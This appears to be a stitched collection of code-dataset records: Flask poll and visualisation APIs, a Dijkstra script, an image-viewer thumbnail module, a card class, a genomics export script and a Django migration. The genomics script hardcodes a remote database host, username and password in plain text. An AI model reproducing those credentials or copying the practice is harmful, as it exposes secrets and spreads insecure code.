(page + 1) * results_per_page]\n    response = {}\n    for post in posts:\n        # options = Option.query.filter_by(pid=post.pid).all()\n        response[post.pid] = {\n            'q': post.question,\n            'lat': float(post.lat),\n            'lng': float(post.lng),\n            'author': uuid\n            #'options': {option.oid: {'votes': option.votes, 'text': option.text} for option in options}\n        }\n    return jsonify(response)\n\n\n@app.route('/posts/@<lat>,<lng>', methods=['GET'])\ndef get_posts_by_location(lat, lng):\n    # default radius if one is not specified\n    radius = request.args.get('r', 5)\n\n    try:\n        # dummy Post object with location for use with filter\n        curr = Post(\"\", float(lat), float(lng), User(\"\"))\n\n        # default page 0\n        page = int(request.args.get('page', 0))\n    except ValueError:\n        abort(400, 'please enter decimals for lat and long')\n\n    results_per_page = 10\n\n    posts = Post.query.filter(Post.distance(curr) < 5)[page * results_per_page: (page + 1) * results_per_page]\n    response = {}\n    for post in posts:\n        # options = Option.query.filter_by(pid=post.pid).all()\n        author = User.query.filter_by(uid=post.uid).first()\n        response[post.pid] = {\n            'q': post.question,\n            'lat': float(post.lat),\n            'lng': float(post.lng),\n            'author': author.uuid\n            #'options': {option.oid: {'votes': option.votes, 'text': option.text} for option in options}\n        }\n    return jsonify(response)\n\n\n@app.route('/posts', methods=['POST'])\ndef create_post():\n    required_args = ['q', 'lat', 'lng', 'uuid', 'options']\n    passed_params = {}\n    response = {}\n\n    # get all arguments from post\n    for key in required_args:\n        passed_params[key] = request.form.get(key, None)\n\n    if any(passed_params[key] is None for key in required_args):\n        # not all parameters were passed\n        abort(400, 'missing parameter')\n\n    try:\n        options = ast.literal_eval(passed_params['options'])\n    except SyntaxError:\n        abort(400, 'error parsing options')\n\n    user = User.query.filter_by(uuid=passed_params['uuid']).first()\n\n    if user is None:\n        abort(404, 'could not find user with uuid %s' % passed_params['uuid'])\n\n    post = Post(passed_params['q'], passed_params['lat'], passed_params['lng'], user)\n\n    db.session.add(post)\n    db.session.flush()\n\n    for option in options:\n        db.session.add(Option(option, post.pid))\n\n    db.session.commit()\n    response['message'] = 'post created'\n    return jsonify(response)\n\n\n@app.route('/posts', methods=['DELETE'])\ndef delete_post():\n    # TODO: implementation\n    pid = request.form.get('pid')\n    post = Post.query.filter_by(pid=pid).first()\n    if post is None:\n        abort(404, 'post with pid %s not found' % pid)\n\n    db.session.delete(post)\n    db.session.commit()\n    return jsonify({'message': 'post deleted'})\n\n\n@app.route('/posts/<pid>/options', methods=['GET'])\ndef get_votes(pid):\n    post = Post.query.filter_by(pid=pid).first()\n    if post is None:\n        abort(404, 'post with pid %s not found' % pid)\n    response = {option.oid: {'text': option.text, 'votes': option.votes} for option in post.options}\n    return jsonify(response)\n\n\n@app.route('/posts/<pid>/votes/users/<uuid>', methods=['GET'])\ndef get_votes_from_user(pid, uuid):\n    vote = Vote.query.filter_by(pid=pid, uuid=uuid).first()\n    response = {}\n    if vote is None:\n        response['voted'] = False\n    else:\n        response['voted'] = True\n        response['oid'] = vote.oid\n    return jsonify(response)\n\n\n@app.route('/options/<oid>', methods=['PATCH'])\ndef change_vote(oid):\n    data = json.loads(request.data.decode('utf-8'))\n    uuid = data.get('uuid')\n\n    user = User.query.filter_by(uuid=uuid).first()\n    if user is None:\n        print(uuid)\n        abort(404, 'user with uuid %s not found' % uuid)\n\n    option = 
Option.query.filter_by(oid=oid).first()\n if option is None:\n abort(404, 'option with oid %s not found' % oid)\n\n operation = data.get('op')\n if operation is None:\n abort(400, 'no operation specified')\n\n if operation == 'add':\n vote = Vote(uuid, option.pid, oid)\n db.session.add(vote)\n option.votes += 1\n elif operation == 'remove':\n vote = Vote.query.filter_by(uuid=uuid, pid=option.pid).first()\n db.session.delete(vote)\n option.votes -= 1\n else:\n abort(400, 'not valid operation')\n\n db.session.commit()\n response = {'message': 'voted'}\n return jsonify(response)\n\n\n@app.route('/test/')\ndef test():\n print(request.args.get('q'))\n return 'test'\n","sub_path":"server/server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"79976214","text":"import Base_Equipment\n\nclass Clothing(Base_Equipment.Base_equipment):\n def add_new(self,item):\n if type(item) == Garment and not(item.isempty()):\n super().add_new(item)\n else:\n raise ValueError('expected Garment object, instead got ' + str(type(item)))\n\n def __eq__(self,tocompare):\n if type(tocompare) == Clothing and not(tocompare.isempty()):\n return super().__eq__(tocompare)\n else:\n raise ValueError('expected Clothing object, instead got ' + str(type(tocompare)))\n\nclass Garment(Base_Equipment.Equip):\n\n def __eq__(self,tocompare):\n if type(tocompare) == Garment and not(tocompare.isempty()):\n return super().__eq__(tocompare)\n else:\n raise ValueError('expected Garment object, instead got ' + str(type(tocompare)))\n","sub_path":"OA Objects/Clothing.py","file_name":"Clothing.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"484925850","text":"import os\nos.environ['CUDA_VISIBLE_DEVICES']='0'\n\nimport flask\n\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import send_file\n\nfrom flask_cors import CORS\n\nfrom database import db_session\nfrom models import Job, Visualization, VisualizationResult, STATUS_MAP\n\nfrom lucid.modelzoo import vision_models\n\nimport lucid.modelzoo.vision_models as models\nimport lucid.modelzoo.nets_factory as nets\n\nfrom lucid.modelzoo.nets_factory import get_model\n\nfrom network_utils import NETWORK_DESCRIPTION\n\n# from processor import ProcessorThread\n# import atexit\n\n\n# def close_running_threads():\n# print('joining threads')\n# processor_thread.stop()\n# processor_thread.join()\n\n# atexit.register(close_running_threads)\n\napp = Flask(__name__)\nCORS(app)\n\n\napi_version = 'v1'\n\n# processor_thread = ProcessorThread(db_session)\n# processor_thread.start()\n\nALLOWED_NETWORKS = []\nDATASETS = {}\n\nfor name, model in nets.models_map.items():\n# print name.ljust(27), \" \", Model.dataset\n ALLOWED_NETWORKS.append(name)\n DATASETS[name] = model.dataset\n\n# ALLOWED_NETWORKS = vision_models.__all__[-2:]\n\ndef get_allowed_layers(model_name, flat=False):\n\n# model = get_model(model_name)\n# model.load_graphdef()\n\n# # currently support only two layer types\n# allowed_layers = [node.name for node in model.graph_def.node if node.op in [\n# 'BiasAdd', 'Conv2D']]\n model_cls = getattr(models, model_name, None)\n \n if model_cls:\n if flat:\n allowed_layers = [layer.name for layer in model_cls.layers]\n else:\n allowed_layers = {layer.name:{'type':list(layer.tags)[0], 'depth':layer.depth} for layer in model_cls.layers}\n \n \n else:\n allowed_layers = 
[]\n    \n    return allowed_layers\n\n# ALLOWED_LAYERS = get_allowed_layers(MODEL_NAMES)\n\ndef wrap_reply(data, success=True, data_key='data'):\n    return jsonify({data_key:data, 'success':success})\n\n@app.route('/', methods=['GET'])\ndef api_info():\n    return jsonify({'version': api_version})\n\n\n@app.route(f'/{api_version}/networks/', methods=['GET'])\ndef available_networks():\n    '''\n    Return a list of available networks\n    '''\n\n    reply = []\n\n    for i, net in enumerate(ALLOWED_NETWORKS):\n        reply.append({'id':i, 'description':NETWORK_DESCRIPTION.get(net, 'no description'), 'name':net, 'dataset':DATASETS.get(net, 'unknown')})\n\n    return wrap_reply(reply, data_key='networks')\n\n\n@app.route(f'/{api_version}/networks/<network>', methods=['GET'])\ndef network_def(network):\n    if network in ALLOWED_NETWORKS:\n        return wrap_reply(get_allowed_layers(network))\n    else:\n        return wrap_reply(f'model {network} not found', False)\n\ndef to_url(img_name):\n    im_name = img_name.split('/')[-1]\n    return f'/img/{im_name}'\n\n@app.route(f'/{api_version}/visualizations/', methods=['GET'])\ndef vis_all():\n\n    vis = []\n    for v in Visualization.query.all():\n        d = v._asdict()\n\n        res = []\n\n        for r in v.results:\n            dr = r._asdict()\n            dr['img_url'] = to_url(dr['img_name'])\n            del dr['img_name']\n\n            res.append(dr)\n\n        d['results'] = res\n\n        vis.append(d)\n\n    return wrap_reply(vis)\n\n@app.route(f'/{api_version}/visualizations/<vis_id>', methods=['GET'])\ndef vis_details(vis_id):\n    return jsonify({'data': [vis_id]})\n\n\ndef validate_params(params, required_keys=['network', 'layer']):\n    for key in required_keys:\n        if not key in params:\n            return False\n\n    return True\n\ndef job_to_dict(j):\n    d = {\n        'id': j.id,\n        'status': STATUS_MAP[j.status],\n        'network': j.network,\n        'layer': j.layer,\n        'channel': j.channel,\n        'submitted': j.submitted\n    }\n\n    return d\n\n@app.route(f'/{api_version}/jobs/', methods=['GET', 'POST'])\ndef jobs_all():\n    if flask.request.method == 'POST':\n\n        params = flask.request.get_json()\n\n        if not validate_params(params):\n            return wrap_reply('bad params', False)\n\n        net = params['network']\n\n        if net not in ALLOWED_NETWORKS:\n            return wrap_reply(f'{net} is not allowed', False)\n\n        layer = params['layer']\n\n        allowed_layers = get_allowed_layers(net)\n\n        if layer not in allowed_layers:\n            return wrap_reply(f'{layer} is not allowed', False)\n\n        if 'channel' in params:\n            channel = int(params['channel'])\n\n            max_depth = allowed_layers[layer]['depth']\n\n            if channel >= max_depth:\n                return wrap_reply(f'max depth for {layer} is {max_depth} (submitted {channel})', False)\n            else:\n                # db expects channel to be a string\n                channel = str(channel)\n\n        else:\n            channel = ''\n\n        j = Job(network=params['network'], layer=layer, channel=channel)\n        db_session.add(j)\n        db_session.commit()\n\n        return wrap_reply('')\n    else:\n        jobs = []\n        for j in Job.query.all():\n            d = j._asdict()\n            jobs.append(d)\n\n        return wrap_reply(jobs)\n\n@app.route('/img/<img_name>')\ndef get_image(img_name):\n    filename = f'./imgs_generated/{img_name}'\n    return send_file(filename, mimetype='image/jpg')\n\n\n@app.route(f'/{api_version}/jobs/<job_id>', methods=['GET'])\ndef jobs_detail(job_id):\n    job = Job.query.filter(Job.id==job_id).first()\n    if not job:\n        return wrap_reply(f'{job_id} not found', False)\n    else:\n        d = job._asdict()\n        # there must be a visualization associated object\n        # if job.status == 2:\n        #     d['visualization'] = job.visualization._asdict()\n\n        return wrap_reply(d)\n\ndef run_consumer(thread):\n    # db_session, Job, Visualization, VisualizationResult\n    
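# [added note] stub only - a consumer here would presumably poll db_session for\n    # queued Job rows, much like the commented-out ProcessorThread at the top of\n    # this file.\n    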
pass\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\nif __name__ == \"__main__\":\n print('running')\n app.run(debug=False, port=5001, host='0.0.0.0') # run app in debug mode on port 5001\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"591773493","text":"# N개의 도시가 있다.\n# 1개 도시에서 출발하여 다른 도시에 도착하는 M개의 버스가 있다.\n# A번째 도시에서 B번째 도시까지 가는 버스 비용 최소화를 하려한다.\n# 도시의 번호는 1~N 까지이다.\n\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn = int(input())\nm = int(input())\n\ng = [[] for _ in range(n+1)]\nfor i in range(m):\n a, b, w = map(int, input().split())\n g[a].append((b, w))\n\nst, ed = map(int, input().split())\ndist = [INF] *(n+1)\n\ndef dijkstra(start):\n dist[start] = 0\n q = [(0, st)]\n\n while q:\n w, cur = heapq.heappop(q)\n if dist[cur] < w:\n continue\n for dest, wei in g[cur]:\n cost = dist[cur] + wei\n if dist[dest] > cost:\n dist[dest] = cost\n heapq.heappush(q, (cost, dest))\n\ndijkstra(st)\nprint(dist[ed])","sub_path":"약점체크/최소비용 구하기.py","file_name":"최소비용 구하기.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"585333622","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\"\"\"Thumbnail part of vimiv.\"\"\"\n\nimport os\nfrom math import floor\n\nfrom gi.repository import GdkPixbuf, GLib, Gtk\n\nfrom vimiv.app_component import AppComponent\nfrom vimiv.fileactions import populate\nfrom vimiv.library import Library\nfrom vimiv.thumbnail_manager import ThumbnailManager\n\n\nclass Thumbnail(AppComponent):\n \"\"\"Thumbnail class for vimiv.\n\n Includes the iconview with the thumnbails and all actions that apply to it.\n\n Attributes:\n app: The main vimiv application to interact with.\n toggled: If True thumbnail mode is open.\n zoom_levels: List of tuples containing the possible thumbnail sizes.\n zoom_level_index: Position in the possible_sizes list.\n timer_id: ID of the currently running GLib.Timeout.\n creation failed.\n elements: List containing names of current thumbnail-files.\n markup: Markup string used to highlight search results.\n liststore: Gtk.ListStore containing thumbnail pixbufs and names.\n iconview: Gtk.IconView to display thumbnails.\n columns: Amount of columns that fit into the window.\n last_focused: Widget that was focused before thumbnail.\n \"\"\"\n\n def __init__(self, app, settings):\n \"\"\"Create the necessary objects and settings.\n\n Args:\n app: The main application class to interact with.\n settings: Settings from configfiles to use.\n \"\"\"\n super().__init__(app)\n general = settings[\"GENERAL\"]\n\n # Settings\n self.toggled = False\n self.padding = general[\"thumb_padding\"]\n self.timer_id = GLib.Timeout\n self.elements = []\n self.markup = self.get_component(Library).markup.replace(\"fore\", \"back\")\n\n zoom_level = general[\"default_thumbsize\"]\n self.zoom_levels = [(64, 64), (128, 128), (256, 256), (512, 512)]\n self.zoom_level_index = self.zoom_levels.index(zoom_level)\n\n # Creates the Gtk elements necessary for thumbnail mode, fills them\n # and focuses the iconview\n # Create the liststore and iconview\n self.liststore = Gtk.ListStore(GdkPixbuf.Pixbuf, str)\n self.iconview = Gtk.IconView.new()\n self.iconview.connect(\"item-activated\", self.iconview_clicked)\n self.iconview.connect(\"key_press_event\", 
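\n                              # [added note] extra connect() arguments - here the mode string - are\n                              # forwarded by GTK to the handler as user data.\n                              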
self.app[\"eventhandler\"].run,\n \"THUMBNAIL\")\n self.iconview.connect(\"button_press_event\",\n self.app[\"eventhandler\"].run, \"THUMBNAIL\")\n self.iconview.set_model(self.liststore)\n self.iconview.set_pixbuf_column(0)\n self.iconview.set_markup_column(1)\n\n self.columns = 0\n self.iconview.set_item_width(0)\n self.iconview.set_item_padding(self.padding)\n self.last_focused = \"\"\n self.thumbnail_manager = ThumbnailManager()\n\n def iconview_clicked(self, iconview, path):\n \"\"\"Select and show image when thumbnail was activated.\n\n Args:\n iconview: Gtk.IconView that emitted the signal.\n path: Gtk.TreePath of the activated thumbnail.\n \"\"\"\n self.toggle(True)\n count = path.get_indices()[0] + 1\n self.app[\"eventhandler\"].num_clear()\n self.app[\"eventhandler\"].num_str = str(count)\n self.app[\"image\"].move_pos()\n\n def toggle(self, select_image=False):\n \"\"\"Toggle thumbnail mode.\n\n Args:\n select_image: If True an image was selected. Never focus the library\n then.\n \"\"\"\n # Close\n if self.toggled:\n self.app[\"image\"].scrolled_win.remove(self.iconview)\n self.app[\"image\"].scrolled_win.add(self.app[\"image\"].viewport)\n if self.last_focused == \"im\" or select_image:\n self.app[\"image\"].scrolled_win.grab_focus()\n elif self.last_focused == \"lib\":\n self.app[\"library\"].focus()\n # Re-expand the library if there is no image and the setting\n # applies\n if self.app[\"library\"].expand and \\\n self.app[\"image\"].pixbuf_original.get_height() == 1:\n self.app[\"image\"].scrolled_win.hide()\n self.app[\"library\"].scrollable_treeview.set_hexpand(True)\n self.toggled = False\n # Open thumbnail mode differently depending on where we come from\n elif self.app.paths and self.app[\"image\"].scrolled_win.is_focus():\n self.last_focused = \"im\"\n self.show()\n elif self.app[\"library\"].files \\\n and self.app[\"library\"].treeview.is_focus():\n self.last_focused = \"lib\"\n self.app.paths, self.app.index = populate(self.app[\"library\"].files)\n if self.app.paths:\n self.app[\"library\"].scrollable_treeview.set_hexpand(False)\n self.app[\"image\"].scrolled_win.show()\n self.show()\n else:\n self.app[\"statusbar\"].message(\"No images in directory\", \"error\")\n return\n else:\n self.app[\"statusbar\"].message(\"No open image\", \"error\")\n return\n # Manipulate bar is useless in thumbnail mode\n if self.app[\"manipulate\"].scrolled_win.is_visible():\n self.app[\"manipulate\"].toggle()\n # Update info for the current mode\n self.app[\"statusbar\"].update_info()\n\n def calculate_columns(self):\n \"\"\"Calculate how many columns fit into the current window.\"\"\"\n width = self.app[\"window\"].winsize[0]\n if self.app[\"library\"].grid.is_visible():\n width -= self.app[\"library\"].width\n\n self.columns = floor(\n (width - 12) / (self.get_zoom_level()[0] + 2 * self.padding))\n if self.columns < 1:\n self.columns = 1\n free_space = (width - 12) % (\n self.get_zoom_level()[0] + 2 * self.padding)\n padding = floor(free_space / self.columns)\n self.iconview.set_column_spacing(padding)\n self.iconview.set_columns(self.columns)\n\n def show(self, toggled=False):\n \"\"\"Show thumbnails when called from toggle.\n\n Args:\n toggled: If True thumbnail mode is already toggled.\n \"\"\"\n # Clean liststore\n self.liststore.clear()\n\n # Draw the icon view instead of the image\n if not toggled:\n self.app[\"image\"].scrolled_win.remove(self.app[\"image\"].viewport)\n self.app[\"image\"].scrolled_win.add(self.iconview)\n # Show the window\n self.iconview.show()\n 
self.toggled = True\n\n # Add initial placeholder for all thumbnails\n default_pixbuf_max = GdkPixbuf.Pixbuf.new_from_file_at_scale(\n self.thumbnail_manager.default_icon,\n *self.get_zoom_level(), True)\n size = self.get_zoom_level()[0]\n default_pixbuf = self.thumbnail_manager.scale_pixbuf(default_pixbuf_max,\n size)\n for path in self.app.paths:\n name = self._get_name(path)\n self.liststore.append([default_pixbuf, name])\n\n # Generate thumbnails asynchronously\n self.reload_all(ignore_cache=True)\n\n # Set columns\n self.calculate_columns()\n\n # Focus the current image\n self.iconview.grab_focus()\n pos = self.app.index % len(self.app.paths)\n self.move_to_pos(pos)\n\n def reload_all(self, ignore_cache=False):\n size = self.get_zoom_level()[0]\n for i, path in enumerate(self.app.paths):\n self.thumbnail_manager.get_thumbnail_at_scale_async(\n path, size, self._on_thumbnail_created, i,\n ignore_cache=ignore_cache)\n\n def _on_thumbnail_created(self, pixbuf, position):\n # Subsctipting the liststore directly works fine\n # pylint: disable=unsubscriptable-object\n self.liststore[position][0] = pixbuf\n self.move_to_pos(self.app.get_pos(force_widget=\"thu\"))\n\n def _get_name(self, filename):\n name = os.path.splitext(os.path.basename(filename))[0]\n if filename in self.app[\"mark\"].marked:\n name += \" [*]\"\n\n return name\n\n def reload(self, filename, reload_image=True):\n \"\"\"Reload the thumbnails of manipulated images.\n\n Args:\n filename: Name of the file to reload thumbnail of.\n reload_image: If True reload the image of the thumbnail. Else only\n the name (useful for marking).\n \"\"\"\n index = self.app.paths.index(filename)\n name = self._get_name(filename)\n if index in self.app[\"commandline\"].search_positions:\n name = self.markup + \"\" + name + \"\"\n\n # pylint: disable=unsubscriptable-object\n if reload_image:\n self.thumbnail_manager.get_thumbnail_at_scale_async(\n filename, self.get_zoom_level()[0],\n self._on_thumbnail_created, index, ignore_cache=True)\n\n self.liststore[index][1] = name\n\n def move_direction(self, direction):\n \"\"\"Scroll with \"hjkl\".\n\n Args:\n direction: Direction to scroll in. 
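(Added note: uppercase \"HJKL\", also handled below, jump to the\n                first/last element of the current row or column.) 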
One of \"hjkl\".\n \"\"\"\n # Start at current position\n new_pos = self.app.get_pos(force_widget=\"thu\")\n # Check for a user prefixed step\n step = self.app[\"eventhandler\"].num_receive()\n # Get variables used for calculation of limits\n last = len(self.app.paths)\n rows = self.iconview.get_item_row(Gtk.TreePath(last - 1))\n elem_last_row = last - rows * self.columns\n elem_per_row = floor((last - elem_last_row) / rows) if rows else last\n column = self.iconview.get_item_column(Gtk.TreePath(new_pos))\n row = self.iconview.get_item_row(Gtk.TreePath(new_pos))\n min_pos = 0\n max_pos = last - 1\n # Simple scrolls\n if direction == \"h\":\n new_pos -= step\n elif direction == \"k\":\n min_pos = column\n new_pos -= self.columns * step\n elif direction == \"l\":\n new_pos += step\n elif direction == \"j\":\n max_pos = (rows - 1) * elem_per_row + column \\\n if column >= elem_last_row else rows * elem_per_row + column\n new_pos += self.columns * step\n # First element in row\n elif direction == \"H\":\n new_pos = row * elem_per_row\n # Last element in column\n elif direction == \"J\":\n new_pos = (rows - 1) * elem_per_row + column \\\n if column >= elem_last_row else rows * elem_per_row + column\n # First element in column\n elif direction == \"K\":\n new_pos %= elem_per_row\n # Last element in row\n elif direction == \"L\":\n new_pos = (row + 1) * elem_per_row - 1\n # Do not scroll to paths that are over the limits\n if new_pos < min_pos:\n new_pos = min_pos\n elif new_pos > max_pos:\n new_pos = max_pos\n # Move\n self.move_to_pos(new_pos)\n\n def move_to_pos(self, pos):\n \"\"\"Set focus on position in iconview and center it.\n\n Args:\n pos: The position to focus.\n \"\"\"\n self.iconview.select_path(Gtk.TreePath(pos))\n cell_renderer = self.iconview.get_cells()[0]\n self.iconview.set_cursor(Gtk.TreePath(pos), cell_renderer, False)\n self.iconview.scroll_to_path(Gtk.TreePath(pos), True, 0.5, 0.5)\n # Clear the user prefixed step\n self.app[\"eventhandler\"].num_clear()\n\n def zoom(self, inc=True):\n \"\"\"Zoom thumbnails.\n\n Args:\n inc: If True increase thumbnail size.\n \"\"\"\n # What zoom and limits\n if inc and self.zoom_level_index < len(self.zoom_levels) - 1:\n self.zoom_level_index += 1\n elif not inc and self.zoom_level_index > 0:\n self.zoom_level_index -= 1\n else:\n return\n\n # Rescale all images in liststore\n if self.toggled:\n self.reload_all()\n\n # Set columns and refocus current image\n self.calculate_columns()\n self.move_to_pos(self.app.get_pos(force_widget=\"thu\"))\n\n def get_zoom_level(self):\n return self.zoom_levels[self.zoom_level_index]\n","sub_path":"vimiv/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"612070677","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2012 Majormode. All rights reserved.\r\n#\r\n# This software is the confidential and proprietary information of\r\n# Majormode or one of its subsidiaries. You shall not disclose this\r\n# confidential information and shall use it only in accordance with\r\n# the terms of the license agreement or other applicable agreement you\r\n# entered into with Majormode.\r\n#\r\n# MAJORMODE MAKES NO REPRESENTATIONS OR WARRANTIES ABOUT THE\r\n# SUITABILITY OF THE SOFTWARE, EITHER EXPRESS OR IMPLIED, INCLUDING\r\n# BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT. 
MAJORMODE\r\n# SHALL NOT BE LIABLE FOR ANY LOSSES OR DAMAGES SUFFERED BY LICENSEE\r\n# AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THIS SOFTWARE OR ITS\r\n# DERIVATIVES.\r\n#\r\n# @version $Revision$\r\n\r\nimport random\r\n\r\nclass AngloAmericanCard(object):\r\n \"\"\"\r\n Represent a card of the standard Anglo-American deck of 52 playing\r\n cards that includes thirteen ranks of each of the four French suits,\r\n spades, hearts, diamonds, and clubs.\r\n \"\"\"\r\n # Identification of each card rank.\r\n CARD_RANK_2 = 0\r\n CARD_RANK_3 = 1\r\n CARD_RANK_4 = 2\r\n CARD_RANK_5 = 3\r\n CARD_RANK_6 = 4\r\n CARD_RANK_7 = 5\r\n CARD_RANK_8 = 6\r\n CARD_RANK_9 = 7\r\n CARD_RANK_10 = 8\r\n CARD_RANK_JACK = 9\r\n CARD_RANK_QUEEN = 10\r\n CARD_RANK_KING = 11\r\n CARD_RANK_ACE = 12\r\n\r\n CARD_RANK_COUNT = 13\r\n\r\n # Identification of each card suit.\r\n CARD_SUIT_SPADES = 0\r\n CARD_SUIT_HEARTS = 1\r\n CARD_SUIT_DIAMONDS = 2\r\n CARD_SUIT_CLUBS = 3\r\n\r\n CARD_SUIT_COUNT = 4\r\n\r\n # Code names of Anglo-American card ranks.\r\n CARD_RANK_NAMES = {\r\n CARD_RANK_2: '2',\r\n CARD_RANK_3: '3',\r\n CARD_RANK_4: '4',\r\n CARD_RANK_5: '5',\r\n CARD_RANK_6: '6',\r\n CARD_RANK_7: '7',\r\n CARD_RANK_8: '8',\r\n CARD_RANK_9: '9',\r\n CARD_RANK_10: '10',\r\n CARD_RANK_JACK: 'J',\r\n CARD_RANK_QUEEN: 'Q',\r\n CARD_RANK_KING: 'K',\r\n CARD_RANK_ACE: 'A'\r\n }\r\n\r\n # Code names of Anglo-American card suits.\r\n CARD_SUIT_NAMES = {\r\n CARD_SUIT_SPADES: 'S',\r\n CARD_SUIT_HEARTS: 'H',\r\n CARD_SUIT_DIAMONDS: 'D',\r\n CARD_SUIT_CLUBS: 'C'\r\n }\r\n\r\n def __init__(self, rank, suit):\r\n assert (rank >= 0) and (rank < AngloAmericanCard.CARD_RANK_COUNT), 'Invalid card rank \"%d\"' % rank\r\n assert (suit >= 0) and (suit < AngloAmericanCard.CARD_SUIT_COUNT), 'Invalid card suit \"%d\"' % suit\r\n self.rank = rank\r\n self.suit = suit\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n Return the “official” string representation of this card object. It\r\n looks like a valid Python expression that could be used to recreate an\r\n object with the same value using the static method ``from_string``.\r\n\r\n @return: a string representation of this card instance.\r\n \"\"\"\r\n return self.__str__()\r\n\r\n def __str__(self):\r\n \"\"\"\r\n Return a string representation of this card.\r\n\r\n @return: a string representation of this card composed of two\r\n characters. 
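\r\n\r\n        Illustrative doctest-style example (added):\r\n\r\n        >>> str(AngloAmericanCard(AngloAmericanCard.CARD_RANK_ACE,\r\n        ...                       AngloAmericanCard.CARD_SUIT_SPADES))\r\n        'AS'\r\n\r\n        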
The first character corresponds to the rank of\r\n this card, while the second character corresponds to the suit\r\n of the card.\r\n \"\"\"\r\n return \"%s%s\" % (AngloAmericanCard.CARD_RANK_NAMES[self.rank],\r\n AngloAmericanCard.CARD_SUIT_NAMES[self.suit])\r\n\r\n @staticmethod\r\n def from_string(string):\r\n \"\"\"\r\n Return an instance ``AngloAmericanCard`` built from a card string\r\n representation passed to this function.\r\n\r\n @param string: a string representation of a card, composed of a pair\r\n of two letters, case not sensitive, corresponding, in that\r\n order, to the rank and to the suit of an Anglo-American card.\r\n\r\n @return: an instance ``AngloAmericanCard``.\r\n\r\n @raise AssertError: if the card string representation is not valid.\r\n \"\"\"\r\n assert len(string) == 2, 'Invalid card string representation \"%s\"' % string\r\n return AngloAmericanCard(AngloAmericanCard.CARD_RANK_NAMES.values().index(string[0]),\r\n AngloAmericanCard.CARD_SUIT_NAMES.values().index(string[1]))\r\n\r\n @staticmethod\r\n def shuffle_cards():\r\n \"\"\"\r\n Return a shuffled deck of 52 playing cards.\r\n\r\n @return: a shuffled deck of 52 playing cards.\r\n \"\"\"\r\n cards = [ AngloAmericanCard(rank, suit)\r\n for rank in range(len(AngloAmericanCard.CARD_RANK_NAMES))\r\n for suit in range(len(AngloAmericanCard.CARD_SUIT_NAMES)) ]\r\n\r\n random.seed()\r\n random.shuffle(cards)\r\n return cards\r\n","sub_path":"majormode/perseus/model/anglo_american_card.py","file_name":"anglo_american_card.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"497085960","text":"#!/urs/bin/python\nimport dumper\nimport MySQLdb\nimport msgpack\n\ndef gene2pathway():\n conn = MySQLdb.connect(host='rdsikqm8sr3rugdu1muh3.mysql.rds.aliyuncs.com',user='gpo',passwd='btlc123',db='clinic')\n cursor = conn.cursor()\n sql1 = 'select * from gene2pathway'\n cursor.execute(sql1)\n results1 = cursor.fetchall()\n gene2paths = {}\n for result in results1:\n gene=result[0]\n paths=result[1]\n kegs = paths.lstrip('|').split('|')\n gene2paths[gene] = kegs\n return gene2paths\n\npaths = gene2pathway()\npacked = msgpack.packb(paths)\nfp = open(\"gene2paths.bson\",\"w\")\n\nfp.write(packed)\n\n \n","sub_path":"seq-service/anno2arrange/anno2sqlnums/gene2pathway.py","file_name":"gene2pathway.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"12808077","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport filebrowser.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('event', '0002_auto_20150406_0231'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='photo',\n options={'ordering': ['photo_order'], 'verbose_name_plural': 'фотографии', 'verbose_name': 'фотографии'},\n ),\n migrations.RemoveField(\n model_name='event',\n name='announce_photo',\n ),\n migrations.RemoveField(\n model_name='event',\n name='title_after',\n ),\n migrations.RemoveField(\n model_name='event',\n name='title_before',\n ),\n migrations.AddField(\n model_name='event',\n name='button',\n field=models.PositiveSmallIntegerField(choices=[(1, 'посмотреть'), (2, 'подробнее'), (3, 'забронировать столик')], verbose_name='Кнопка', default=2),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='event',\n name='photo',\n 
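\n            # [added note] FileBrowseField (django-filebrowser) stores a browsable file\n            # path; presumably the replacement for the 'announce_photo' field removed\n            # above.\n            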
field=filebrowser.fields.FileBrowseField(max_length=255, default='', verbose_name='Графический файл'),\n            preserve_default=False,\n        ),\n        migrations.AddField(\n            model_name='event',\n            name='title_small',\n            field=models.CharField(blank=True, max_length=255, verbose_name='Титул (мелкий шрифт)', help_text='В титулах возможно вставлять
